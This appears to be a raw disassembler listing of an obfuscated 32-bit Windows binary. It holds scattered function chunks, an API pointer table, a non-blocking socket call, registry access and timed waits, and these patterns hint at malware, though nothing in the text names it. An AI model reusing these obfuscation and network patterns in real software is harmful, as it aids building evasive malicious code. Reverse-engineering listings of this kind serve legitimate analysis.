loc_9B0C90: ; CODE XREF: sub_9B1F68+22EE�j
mov edx, dword_9BCB74
push dword ptr [edx]
pop eax
call dword ptr [eax+30h]
sub eax, [edi+ebp-250h]
push dword ptr [ebp-38h]
pop ecx
neg ecx
sbb ecx, ecx
and ecx, 0FFFFFC18h
add ecx, 1388h
cmp eax, ecx
jbe loc_9AFB74
jmp off_9B89C2
; END OF FUNCTION CHUNK FOR sub_9B1F68
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B0CC8 proc near ; CODE XREF: sub_9AFC28+CC8�j
push ebx
call sub_9B0C20
jmp loc_9ADF17
sub_9B0CC8 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9B0CD4: ; CODE XREF: sub_9B1D80-3F9�j
test byte ptr [ebp-2024h], 1
jnz loc_9B3EC4
jmp off_9BACE8
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B0CE8: ; CODE XREF: sub_9B0930+3F08�j
; DATA XREF: .text:off_9BAB16�o
push off_9BAD70
push dword ptr [eax]
pop eax
push eax
call esi
mov ecx, dword_9BCB74
push dword ptr [ecx]
pop edx
mov [edx+54h], eax
mov eax, dword_9BCB74
mov eax, [eax]
mov ecx, [eax+54h]
or ecx, ecx
jz loc_9B23EF
jmp loc_9ABCB8
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B649C
loc_9B0D18: ; CODE XREF: sub_9B649C-1369�j
push 100h
pop edx
loc_9B0D1E: ; CODE XREF: sub_9B649C-7AB0�j
mov [ebp+var_24], edx
cmp edx, 4000h
ja loc_9AE5F0
jmp off_9BA097
; END OF FUNCTION CHUNK FOR sub_9B649C
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B0D34 proc near ; CODE XREF: sub_9B63D8-4B67�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 009AF8A8 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 009B19BC SIZE 00000008 BYTES
; FUNCTION CHUNK AT 009B2D84 SIZE 00000005 BYTES
push eax
push esi
mov eax, 8
mov dword ptr [edi], 0
call sub_9AC32C
test al, 3
jnz nullsub_10
jmp loc_9AF8A8
sub_9B0D34 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4FD0
loc_9B0D54: ; CODE XREF: sub_9B4FD0-1EC7�j
cmp eax, 0FFFFFFFFh
jnz loc_9ABB60
jmp sub_9ABB50
; END OF FUNCTION CHUNK FOR sub_9B4FD0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4950
loc_9B0D64: ; CODE XREF: sub_9B4950-5A0A�j
; sub_9B4950-19A�j
; DATA XREF: ...
cmp dword_9BEC20[edi], ebx
jnz loc_9B5C2E
jmp off_9B9F17
; END OF FUNCTION CHUNK FOR sub_9B4950
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9B0D78: ; CODE XREF: sub_9B3864-5020�j
; sub_9B3864-405A�j
; DATA XREF: ...
push [ebp+var_202C]
pop edx
test edx, edx
js loc_9AF480
jmp off_9B96E8
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9AB040
loc_9B0D90: ; CODE XREF: sub_9AB040+15AB�j
mov ecx, dword_9BEC30[eax]
mov edx, dword_9BEC2C[eax]
and edx, ecx
and ecx, esi
cmp edx, ecx
jz loc_9B0688
jmp off_9BA87C
; END OF FUNCTION CHUNK FOR sub_9AB040
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B1B20
loc_9B0DB0: ; CODE XREF: sub_9B1B20-5EA2�j
; DATA XREF: .text:off_9BA408�o
push edx
push 80000001h
call dword ptr [eax+20h]
test eax, eax
jnz loc_9AC1BE
jmp off_9B96D4
; END OF FUNCTION CHUNK FOR sub_9B1B20
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4CF4
loc_9B0DC8: ; CODE XREF: sub_9B4CF4-277F�j
; DATA XREF: .text:off_9B9EED�o
mov edi, ebx
dec edi
loc_9B0DCB: ; CODE XREF: sub_9B4CF4-3F23�j
mov al, [edi+1]
inc edi
and al, al
jnz short loc_9B0DCB
jmp loc_9AFEC0
; END OF FUNCTION CHUNK FOR sub_9B4CF4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1F68
loc_9B0DD8: ; CODE XREF: sub_9B1F68+241A�j
call sub_9B31A8
inc edi
jmp loc_9AE84E
; END OF FUNCTION CHUNK FOR sub_9B1F68
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AFC28
loc_9B0DE4: ; CODE XREF: sub_9AFC28-A64�j
cmp eax, 0FFFFFFFFh
jz loc_9ADF17
jmp loc_9AEB00
; END OF FUNCTION CHUNK FOR sub_9AFC28
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3E78
loc_9B0DF4: ; CODE XREF: sub_9B3E78+C�j
sub eax, edx
add eax, ebx
push eax
push 1
call sub_9AD3EC
; END OF FUNCTION CHUNK FOR sub_9B3E78
; START OF FUNCTION CHUNK FOR sub_9B4CF4
loc_9B0E00: ; CODE XREF: sub_9B4CF4-4E28�j
mov dword ptr [ebp-4], 0FFFFFFFFh
push ebx
pop eax
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9B4CF4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1F68
loc_9B0E1C: ; CODE XREF: sub_9B1F68+71�j
mov dword ptr [ebp-40h], 2
jmp loc_9ACD83
; END OF FUNCTION CHUNK FOR sub_9B1F68
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B0E28: ; CODE XREF: sub_9B0930+49F4�j
push off_9B933E
mov ecx, [eax]
push ecx
call esi
push dword_9BCB74
pop edx
mov ecx, [edx]
mov [ecx+78h], eax
push dword_9BCB74
pop edx
jmp loc_9B1B0C
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4FD0
loc_9B0E4C: ; CODE XREF: sub_9B4FD0+512�j
; DATA XREF: .text:off_9B8C64�o
push eax
pop ebx
mov [ebp-228h], ebx
loc_9B0E54: ; CODE XREF: sub_9B4FD0-3F79�j
cmp ebx, 0FFFFFFFFh
jnz loc_9AAEF0
jmp loc_9AD318
; END OF FUNCTION CHUNK FOR sub_9B4FD0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ADDA4
loc_9B0E64: ; CODE XREF: sub_9ADDA4+29B�j
mov eax, edi
cdq
push edx
push eax
push ebx
push esi
call __alldiv
mov [ebp-28h], eax
mov [ebp-24h], edx
jmp loc_9AE473
; END OF FUNCTION CHUNK FOR sub_9ADDA4
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B0E7C proc near ; CODE XREF: sub_9B2C70-5606�p
; sub_9B1F68-3EFF�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
mov eax, dword_9BCB74
mov ecx, [eax+10h]
mov eax, [esp+arg_0]
lea edx, [esp+arg_4]
push edx
push 8004667Eh
push eax
call dword ptr [ecx+54h]
neg eax
sbb eax, eax
and eax, 0FFFFFFFDh
add eax, 4
retn 8
sub_9B0E7C endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B04A8
loc_9B0EA4: ; CODE XREF: sub_9B04A8+4CFB�j
; DATA XREF: .text:off_9B9EF5�o
push edi
mov eax, [edi+24h]
push eax
mov ecx, [edi+20h]
push ecx
mov eax, 0Ah
call sub_9B3F28
mov ebx, eax
mov [ebp-404Ch], ebx
test bl, 4
jnz loc_9ACA28
jmp off_9B8D89
; END OF FUNCTION CHUNK FOR sub_9B04A8
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B649C
loc_9B0ED0: ; CODE XREF: sub_9B649C+3F�j
; DATA XREF: .text:off_9B8A06�o
cmp edi, 2000h
ja loc_9ACCD8
jmp loc_9AC3B0
; END OF FUNCTION CHUNK FOR sub_9B649C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B0EE4: ; CODE XREF: sub_9B0930+1B5A�j
push off_9B8E81
mov eax, [eax]
push eax
call esi
push dword_9BCB74
pop ecx
push dword ptr [ecx+10h]
pop edx
mov [edx+1Ch], eax
push dword_9BCB74
pop eax
mov eax, [eax+10h]
mov ecx, [eax+1Ch]
and ecx, ecx
jz loc_9B23EF
jmp off_9BACE0
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AE860
loc_9B0F18: ; CODE XREF: sub_9AE860+623F�j
push edx
pop ecx
shr ecx, 2
rep movsd
push edx
pop ecx
and ecx, 3
rep movsb
mov [ebp+var_4], 0FFFFFFFFh
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9AE860
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B27D8
loc_9B0F40: ; CODE XREF: sub_9B27D8-2626�j
mov dx, word_9B9468
mov [edi], dx
pop edi
mov eax, ebx
pop esi
retn
; END OF FUNCTION CHUNK FOR sub_9B27D8
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9AC250
loc_9B0F50: ; CODE XREF: sub_9AC250+91C3�j
shr edx, 5
push edx
pop ecx
and ecx, 1Fh
push 1
pop ebx
shl ebx, cl
shr edx, 5
test dword_9BA4E8[edx*4], ebx
jnz loc_9B536C
jmp off_9BAD48
; END OF FUNCTION CHUNK FOR sub_9AC250
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ACEE8
loc_9B0F74: ; CODE XREF: sub_9ACEE8+64E2�j
mov edi, 1
mov [ebp-0C4h], edi
loc_9B0F7F: ; CODE XREF: sub_9ACEE8+64DC�j
mov dword_9BF120[esi*4], edi
call sub_9ADDA4
mov [ebp-0E8h], eax
mov edx, dword_9BCB74
mov ecx, [edx]
push eax
push off_9BACEC
call dword ptr [ecx+34h]
loc_9B0FA3: ; CODE XREF: sub_9ACEE8+8AAB�j
mov ecx, [ebp-0C8h]
push dword ptr [ebp-0D0h]
pop edx
call sub_9AC6DC
jmp loc_9ACF55
; END OF FUNCTION CHUNK FOR sub_9ACEE8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AE860
loc_9B0FBC: ; CODE XREF: sub_9AE860-2647�j
imul eax, 343FDh
add eax, 269EC3h
mov [ebp+arg_0], eax
jmp loc_9AC207
; END OF FUNCTION CHUNK FOR sub_9AE860
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_9B0FD0 proc near ; CODE XREF: sub_9B1D80-3F49�p
; FUNCTION CHUNK AT 009AFCB4 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 009B1C48 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 009B27EF SIZE 0000002B BYTES
; FUNCTION CHUNK AT 009B5D24 SIZE 0000003E BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9B9024
push off_9B8CBD
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
push ecx
pop esi
mov [ebp-18h], esp
mov eax, dword_9BCB74
mov ecx, [eax]
push off_9B9632
call dword ptr [ecx+18h]
xor eax, eax
push 7FFh
pop ecx
mov [ebp-4], eax
mov [ebp-1Ch], ecx
loc_9B1018: ; CODE XREF: sub_9B0FD0-131B�j
mov [ebp-20h], eax
cmp eax, 800h
jge loc_9B5D29
jmp off_9B89C6
sub_9B0FD0 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B3984
loc_9B102C: ; CODE XREF: sub_9B3984-7BB7�j
inc esi
jmp loc_9B39EA
; END OF FUNCTION CHUNK FOR sub_9B3984
; ---------------------------------------------------------------------------
align 4
push 1
pop eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9B1038: ; CODE XREF: sub_9AB1A0+7782�j
mov eax, edi
call sub_9B327C
or eax, eax
jz loc_9AD304
jmp loc_9B2248
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B4FD0
loc_9B104C: ; CODE XREF: sub_9B4FD0+57�j
xor eax, eax
loc_9B104E: ; CODE XREF: sub_9B4FD0-83B7�j
mov [ebp-22Ch], eax
cmp eax, 40h
jnb loc_9B0E54
jmp loc_9B54D0
; END OF FUNCTION CHUNK FOR sub_9B4FD0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B2E04
loc_9B1064: ; CODE XREF: sub_9B2E04-626B�j
; DATA XREF: .text:off_9B8C1C�o
push dword_9BCB74
pop eax
push dword ptr [eax+10h]
pop ecx
push edi
call dword ptr [ecx+38h]
or edi, 0FFFFFFFFh
mov [ebp+var_4040], edi
loc_9B107C: ; CODE XREF: sub_9B2E04-6271�j
; sub_9B2E04+2928�j ...
push dword_9BCB74
pop edx
push dword ptr [edx]
pop eax
push 1388h
call dword ptr [eax+4]
mov esi, [ebp+var_4044]
jmp loc_9B240C
; END OF FUNCTION CHUNK FOR sub_9B2E04
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ACA48
loc_9B109C: ; CODE XREF: sub_9ACA48+11F6�j
push dword ptr [ebp-4058h]
pop edx
push edx
sub edx, edx
call sub_9B5CDC
test eax, eax
jnz loc_9B5E0C
jmp off_9B9F13
; END OF FUNCTION CHUNK FOR sub_9ACA48
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
loc_9B10BF: ; CODE XREF: .text:009AFBF9�j
mov dword ptr [ebp-4], 0FFFFFFFFh
push 1
pop eax
push dword ptr [ebp-10h]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B35A0
loc_9B10DC: ; CODE XREF: sub_9B35A0-344B�j
push dword_9BCB74
pop edx
push dword ptr [edx]
pop ecx
push eax
call dword ptr [ecx+24h]
loc_9B10EA: ; CODE XREF: sub_9B35A0-3451�j
; sub_9B35A0-2B8A�j
push edi
call sub_9ABE84
lea edi, dword_9BBF74[esi]
mov ecx, 0Ch
xor eax, eax
rep stosd
jmp loc_9AC99B
; END OF FUNCTION CHUNK FOR sub_9B35A0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B57B4
loc_9B1104: ; CODE XREF: sub_9B57B4-8FB9�j
; DATA XREF: .text:off_9B91C8�o
push dword_9BCB74
pop ecx
push dword ptr [ecx+0Ch]
pop edx
lea eax, [ebp+var_144]
push eax
push 100h
push [ebp+var_24]
pop ecx
push ecx
call dword ptr [edx+0Ch]
mov edx, dword_9BCB74
mov eax, [edx+0Ch]
push 0
jmp loc_9B45E4
; END OF FUNCTION CHUNK FOR sub_9B57B4
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B1134 proc near ; DATA XREF: .text:off_9B9F9D�o
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 009AC9D7 SIZE 0000002B BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push off_9BAD8E
push off_9B8CBD
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 8
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov [ebp+var_4], 0
push [ebp+arg_0]
pop eax
push eax
call sub_9B0C20
jmp loc_9AC9D7
sub_9B1134 endp
; ---------------------------------------------------------------------------
align 4
push dword_9BCB74
pop eax
mov ecx, [eax]
push edx
push off_9BACEC
call dword ptr [ecx+34h]
retn
; ---------------------------------------------------------------------------
push esi
push off_9B9844
pop ecx
call sub_9B5480
mov ecx, 1
call sub_9B4610
xor esi, esi
loc_9B11A1: ; CODE XREF: .text:009B11AB�j
push esi
call sub_9ABE84
inc esi
cmp esi, 40h
jl short loc_9B11A1
jmp off_9B9860
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9B11B4: ; CODE XREF: sub_9B1A08-133A�j
; DATA XREF: .text:off_9BA4C5�o
push [ebp+var_41E0]
pop eax
and eax, eax
jnz loc_9B16BE
jmp off_9B8F8D
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ABD30
loc_9B11CC: ; CODE XREF: sub_9ABD30+20�j
mov ecx, eax
loc_9B11CE: ; CODE XREF: sub_9ABD30+4A79�j
mov edx, [esp+0Ch+arg_8]
pop edi
pop esi
mov dword ptr [edx], 0
push ecx
pop eax
pop ebp
retn 10h
; END OF FUNCTION CHUNK FOR sub_9ABD30
; ---------------------------------------------------------------------------
mov eax, 1
retn
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9B11EB: ; CODE XREF: sub_9AB1A0+A738�j
mov dword ptr [ebp-4], 0FFFFFFFFh
push off_9B9632
loc_9B11F8: ; CODE XREF: sub_9AB1A0+4CDC�j
push dword_9BCB74
pop edx
push dword ptr [edx]
pop eax
call dword ptr [eax+1Ch]
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9B1218: ; CODE XREF: sub_9B63D8-6061�j
push dword ptr [esi+0Ch]
pop eax
cmp eax, ebx
jz loc_9AF944
jmp off_9BB025
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AD3EC
loc_9B122C: ; CODE XREF: sub_9AD3EC+4A�j
push dword ptr [ebp-28h]
pop eax
mov ecx, eax
and ecx, 0FFFFh
push ecx
push dword ptr [ebp-24h]
pop edx
push edx
shr eax, 10h
push eax
push dword ptr [ebp-2Ch]
pop eax
push eax
pop ecx
and ecx, 0FFFFh
push ecx
shr eax, 10h
push eax
push dword ptr [ebp-30h]
pop edx
push edx
push off_9BA861 ; Format
push 103h ; Count
mov eax, [ebp+0Ch]
push eax ; Dest
call _snprintf
add esp, 24h
jmp loc_9B4093
; END OF FUNCTION CHUNK FOR sub_9AD3EC
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9B1278: ; CODE XREF: sub_9B63D8-99B9�j
; sub_9B63D8-DF6�j
; DATA XREF: ...
mov al, [ebp-2117h]
cmp al, 30h
jl loc_9AF944
jmp loc_9AB0C8
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AFF64
loc_9B128C: ; CODE XREF: sub_9AFF64+79�j
push eax
push 7
push ecx
jnz loc_9ADB20
jmp loc_9B0444
; END OF FUNCTION CHUNK FOR sub_9AFF64
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B5904
loc_9B129C: ; CODE XREF: sub_9B5904-1A0E�j
; DATA XREF: .text:off_9BA6DB�o
or esi, esi
sub eax, eax
mov [ebp-20h], esi
loc_9B12A3: ; CODE XREF: sub_9B5904-624B�j
mov [ebp-1Ch], eax
cmp eax, 20h
jge loc_9AFF1D
jmp off_9B8DE7
; END OF FUNCTION CHUNK FOR sub_9B5904
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9ABE84
loc_9B12BB: ; CODE XREF: sub_9ABE84+5F�j
; sub_9ABE84+8AB8�j
mov [ebp+var_4], 0FFFFFFFFh
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov ecx, [ebp+var_1C]
xor ecx, ebp
call sub_9AAAC1
mov esp, ebp
pop ebp
retn 4
; END OF FUNCTION CHUNK FOR sub_9ABE84
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B31A8
loc_9B12E0: ; CODE XREF: sub_9B31A8+116B�j
mov ecx, dword_9BCB74
push dword ptr [ecx]
pop edx
push dword ptr [eax+8]
pop eax
push eax
call dword ptr [edx+2Ch]
loc_9B12F1: ; CODE XREF: sub_9B31A8-50DE�j
push dword ptr [esi]
pop ecx
push ecx
mov edx, 0EA60h
call sub_9AD590
test eax, eax
jz loc_9AE0B8
jmp off_9B8DEB
; END OF FUNCTION CHUNK FOR sub_9B31A8
; ---------------------------------------------------------------------------
align 10h
mov esp, [ebp-18h]
mov dword ptr [ebp-4], 0FFFFFFFFh
push dword ptr [ebp-1Ch]
pop esi
; START OF FUNCTION CHUNK FOR sub_9ABF08
loc_9B131E: ; CODE XREF: sub_9ABF08+331A�j
push esi
pop eax
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_9ABF08
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B1334 proc near ; CODE XREF: sub_9B1D80-6CE3�p
; sub_9ADAC4-26A6�p ...
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 009B60D4 SIZE 00000037 BYTES
test eax, eax
jz loc_9B60DA
jmp off_9B979F
sub_9B1334 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B174C
loc_9B1344: ; CODE XREF: sub_9B174C+5E�j
; DATA XREF: .text:off_9BA43F�o
push dword ptr [eax]
pop eax
cmp edi, eax
jnb loc_9B166F
jmp off_9BA869
; END OF FUNCTION CHUNK FOR sub_9B174C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AF960
loc_9B1358: ; CODE XREF: sub_9AF960-312�j
sub edx, eax
push ebx
pop edi
dec edi
loc_9B135D: ; CODE XREF: sub_9AF960+1A03�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_9B135D
jmp off_9B8FC4
; END OF FUNCTION CHUNK FOR sub_9AF960
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AF030
loc_9B136C: ; CODE XREF: sub_9AF030+516D�j
; DATA XREF: .text:off_9B89BE�o
cmp [ebp+var_24], ebx
jnz loc_9AC62B
jmp off_9B9FDB
; END OF FUNCTION CHUNK FOR sub_9AF030
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AC250
loc_9B137C: ; CODE XREF: sub_9AC250+9720�j
; DATA XREF: .text:off_9BAAD4�o
push dword ptr [esi]
pop edx
cmp edx, edi
jz loc_9B536C
jmp off_9B9264
; END OF FUNCTION CHUNK FOR sub_9AC250
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9ADDA4
loc_9B1390: ; CODE XREF: sub_9ADDA4+FAC�j
mov [ebp-2Ch], esi
push 1
pop ecx
loc_9B1396: ; CODE XREF: sub_9ADDA4+B06�j
mov [ebp-1Ch], ecx
cmp ecx, edi
jge loc_9B5468
jmp off_9B9040
; END OF FUNCTION CHUNK FOR sub_9ADDA4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9B13A8: ; CODE XREF: sub_9B63D8-234F�j
; sub_9B63D8-1950�j
mov [ebp-212Ch], ebx
cmp dword ptr [eax+ebx*4], 0
jz loc_9B593C
jmp off_9BAA01
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B3B1C
loc_9B13C0: ; CODE XREF: sub_9B3B1C+50�j
; sub_9B3B1C+F2B�j
; DATA XREF: ...
push 6
mov edx, off_9B985C
push 2004h
pop ecx
call sub_9B4480
and eax, eax
jnz loc_9B1D3F
jmp off_9B99AF
; END OF FUNCTION CHUNK FOR sub_9B3B1C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9B13E4: ; CODE XREF: sub_9B3864-1191�j
; DATA XREF: .text:off_9B9336�o
xor edx, edx
cmp edx, [ebp+var_2068]
sbb eax, eax
inc eax
mov [ebp+var_206C], eax
lea edx, [ebp+var_201C]
mov [ebp+var_205C], edx
jmp loc_9AE2C6
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B1408: ; CODE XREF: sub_9B0930-2D4�j
; DATA XREF: .text:off_9BA8C4�o
push off_9BA68C
push dword ptr [eax]
pop eax
push eax
call esi
push dword_9BCB74
pop ecx
push dword ptr [ecx]
pop edx
mov [edx+34h], eax
push dword_9BCB74
pop eax
mov eax, [eax]
push dword ptr [eax+34h]
pop ecx
test ecx, ecx
jz loc_9B23EF
jmp off_9B9F62
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9B143C: ; CODE XREF: sub_9AB1A0+2B22�j
; DATA XREF: .text:off_9B97B9�o
push eax
pop ecx
and ecx, esi
cmp edi, ecx
jz loc_9B290C
jmp loc_9B0720
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B3D1C
loc_9B1450: ; CODE XREF: sub_9B3D1C-2518�j
; DATA XREF: .text:off_9BA4DD�o
push dword ptr [ebx]
pop ecx
mov edi, [eax+48h]
mov edx, ecx
shr ecx, 2
rep movsd
push edx
pop ecx
and ecx, 3
rep movsb
loc_9B1464: ; CODE XREF: sub_9B3D1C-251E�j
; sub_9B3D1C+41�j
mov dword ptr [ebp-4], 0FFFFFFFFh
push dword ptr [ebp-10h]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9B3D1C
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B1F68
loc_9B1480: ; CODE XREF: sub_9B1F68-6CAE�j
; sub_9B1F68-416D�j
inc edx
jmp loc_9B5EE2
; END OF FUNCTION CHUNK FOR sub_9B1F68
; ---------------------------------------------------------------------------
align 4
dd 0CB74A151h, 88B009Bh, 3051FF56h, 0CB7435FFh, 8B5A009Bh
dd 5832FFF0h, 2B3050FFh, 3E83DC6h, 830F0000h, 2658h, 0FFD19FE9h
dd 498DFFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AF5E4
loc_9B14B8: ; CODE XREF: sub_9AF5E4+13FE�j
; DATA XREF: .text:off_9BA7F6�o
mov edi, ebx
sub edx, eax
dec edi
loc_9B14BD: ; CODE XREF: sub_9AF5E4+1EDF�j
mov cl, [edi+1]
inc edi
and cl, cl
jnz short loc_9B14BD
jmp loc_9AD8F4
; END OF FUNCTION CHUNK FOR sub_9AF5E4
; ---------------------------------------------------------------------------
mov edi, edi
; =============== S U B R O U T I N E =======================================
sub_9B14CC proc near ; CODE XREF: sub_9B2118:loc_9AFA38�p
; FUNCTION CHUNK AT 009B3CB0 SIZE 00000032 BYTES
; FUNCTION CHUNK AT 009B4783 SIZE 0000001C BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9BAC5B
push off_9B8CBD
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
sub eax, eax
mov [ebp-18h], esp
mov [ebp-1Ch], eax
push off_9B91EC
pop ecx
mov [ebp-4], eax
call sub_9ABA3C
and eax, eax
jz loc_9B4783
jmp off_9B8E79
sub_9B14CC endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AF030
loc_9B1518: ; CODE XREF: sub_9AF030+1BCE�j
push dword_9BBFA0[esi]
pop ecx
cmp ecx, 340h
jb loc_9AC62B
jmp loc_9B4AE4
; END OF FUNCTION CHUNK FOR sub_9AF030
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B4480
loc_9B1530: ; CODE XREF: sub_9B4480+A9�j
mov [ebp+var_32C], ebx
mov eax, dword_9BCB74
mov ecx, [eax+0Ch]
lea edx, [ebp+var_32C]
push edx
push edi
push esi
push esi
lea eax, [ebp+var_120]
push eax
push [ebp+var_330]
pop edx
push edx
call dword ptr [ecx+10h]
or eax, eax
jnz loc_9AE273
jmp loc_9B3DD8
; END OF FUNCTION CHUNK FOR sub_9B4480
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AC6DC
